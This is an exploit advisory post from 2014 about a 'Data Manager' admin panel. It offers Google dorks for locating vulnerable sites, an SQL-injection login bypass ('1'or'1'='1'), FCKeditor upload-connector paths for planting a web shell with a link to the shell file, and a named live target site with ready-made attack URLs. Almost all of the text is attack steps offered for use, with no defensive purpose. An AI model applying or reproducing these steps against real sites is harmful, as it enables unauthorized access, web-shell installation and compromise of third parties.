facebook facebook twitter rss

Data Manager adminpanel Multip Vulnerabilities

Author: FXhacker.TN , Published: 03-10-2014
######################

# Exploit Title : Data Manager adminpanel Multip Vulnerabilities

# type : Webapp

# Exploit Author : FXhacker.TN [ www.FB.com/omarfarhat2014 ]

# Google Dork : הכנס שם משתמש וסיסמא לכניסה למערכת "מנהל נתונים". שם משתמש:

# Google Dork : inurl:/*-admin/fckeditor/_samples/gadmin/index.asp

# Version: All

# Date: 2014/02/10

# Tested On : Windows 7

######################


##############################################################################

# The CMS of this admin panel has "Fckeditor valun" & "Bypass valun"

# !! the admin panel path have not the same path in all valun sites , so the dork will found for u directly the admin panel !!

# Bypass:

# path: target.co.il/{changable}-admin/fckeditor/_samples/gadmin/index.asp

# EXPLOIT: user:1'or'1'='1 pass:1'or'1'='1

##############################################################################

# FCKeditor [how to exploit in this case ] :

# path : target.co.il/{changable}-admin/fckeditor/editor/filemanager/browser/default/browser.html

# EXPLOIT : ?Connector=connectors/asp/connector.asp

# shell path : target.co.il/userfiles/file/{your shell}

# smartshell.cer : pastebin.ca/2850984

###############################################################################

# Live test :

# target: http://yaronhaviv.co.il

# Bypass: http://yaronhaviv.co.il/yaron-admin/fckeditor/_samples/gadmin/index.asp

# Fckeditor: http://yaronhaviv.co.il/yaron-admin/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp

################################################################################

#

######################

# Discovered by : FXhacker.TN [ www.FB.com/omarfarhat2014 ]

######################

Like us on Facebook :